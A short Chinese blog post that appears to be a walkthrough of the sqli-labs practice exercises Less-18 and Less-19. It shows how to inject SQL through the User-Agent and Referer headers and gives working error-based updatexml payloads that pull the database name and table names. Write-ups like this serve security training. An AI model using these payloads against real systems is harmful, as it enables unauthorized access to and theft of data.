欢迎光临散文网 会员登陆 & 注册

sqlilabs less-18、19

2022-09-17 15:59 作者:笨蛋灬你变了  | 我要投稿

页面显示

在username和password输入各种判断注入点的符号(' -- ) " ),都无回显。

所以输入正确username和password后显示:

所以使用抓包软件抓取user agent:' 显示

''显示,即闭合了sql语句。

'and order by 3' 显示

尝试用显错updatexml函数。updatexml函数(格式:UPDATEXML (XML_document, XPath_string, new_value)。因为concat()得到的字符串不符合XPath_string,所以会出现XPATH syntax error这个错误。

'or updatexml(1,concat('#',(database())),1) or' 显示

'or updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)or'

如此继续。多个输出内容可以limit字句作输出限制。

less-19

同less-18一样,将user agent处改为referer即可


标签:

sqlilabs less-18、19的评论 (共 条)

分享到微博请遵守国家法律